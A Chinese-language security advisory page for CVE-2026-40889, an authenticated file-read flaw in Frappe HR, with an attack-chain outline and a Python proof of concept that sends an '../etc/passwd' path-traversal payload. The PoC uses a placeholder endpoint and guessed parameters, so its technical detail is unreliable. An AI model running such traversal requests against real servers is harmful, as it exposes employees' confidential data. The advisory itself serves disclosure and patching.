CVE-2026-40889 CVSS 6.5 中危

CVE-2026-40889 Frappe HR 未授权文件访问漏洞

披露日期: 2026-04-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40889

漏洞类型

路径遍历

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Frappe HR

漏洞概述

Frappe HR是一款广泛使用的开源人力资源管理解决方案（HRMS）。在15.58.2和16.4.2版本之前，该软件存在安全缺陷，允许经过身份验证的用户通过利用特定的API端点，访问系统上未授权的敏感文件。这一漏洞可能导致机密数据泄露，目前官方已在后续版本中发布补丁修复，且暂无已知的临时缓解方案，建议用户尽快升级。

技术细节

该漏洞属于路径遍历或不安全的直接对象引用（IDOR）类型。其根本原因在于Frappe HR在特定API端点处理文件访问请求时，未能严格校验用户权限与请求路径的合法性。攻击者无需具备管理员权限，仅需拥有普通低权限账户，即可通过网络向目标系统发送特制的恶意HTTP请求。由于系统缺乏有效的访问控制列表（ACL）检查，攻击者能够利用该接口遍历目录或直接读取服务器上未授权的敏感文件。攻击过程无需任何用户交互，利用复杂度低。成功利用此漏洞将导致高机密性影响，攻击者可能窃取薪资数据、个人隐私信息等关键文件，但该漏洞不会影响数据的完整性和系统的可用性。

攻击链分析

STEP 1

1. 信息收集

攻击者识别出目标网络中运行着Frappe HR系统，并确定其版本低于15.58.2或16.4.2。

STEP 2

2. 获取凭证

攻击者通过钓鱼或社会工程学手段，或者注册一个合法的普通用户账户，获取低权限的认证Token。

STEP 3

3. 漏洞利用

攻击者构造包含恶意文件路径参数的API请求，利用低权限账户发送给存在漏洞的端点。

STEP 4

4. 数据泄露

服务器端未正确校验权限，直接返回了请求的敏感文件内容给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL of the vulnerable Frappe HR instance
url = "http://vulnerable-host/api/method/endpoint.targeting.file.access"

# Headers with authentication (Low privilege user required)
headers = {
    "Authorization": "token <low_priv_api_key>:<low_priv_api_secret>",
    "Accept": "application/json"
}

# Malicious payload to read unauthorized files
# The specific parameter name might vary depending on the exact vulnerable endpoint
data = {
    "path": "../../../../../../../etc/passwd",
    "cmd": "read_file"
}

try:
    response = requests.post(url, headers=headers, json=data, timeout=10)
    if response.status_code == 200 and "root:" in response.text:
        print("[+] Exploit successful! Sensitive data leaked:")
        print(response.text)
    else:
        print("[-] Exploit failed or target patched.")
except Exception as e:
    print(f"Error: {e}")

影响范围

Frappe HR < 15.58.2

Frappe HR < 16.4.2

防御指南

临时缓解措施

目前没有已知的变通方案，建议立即升级到修复版本（15.58.2 或 16.4.2 及以上）以彻底解决该漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表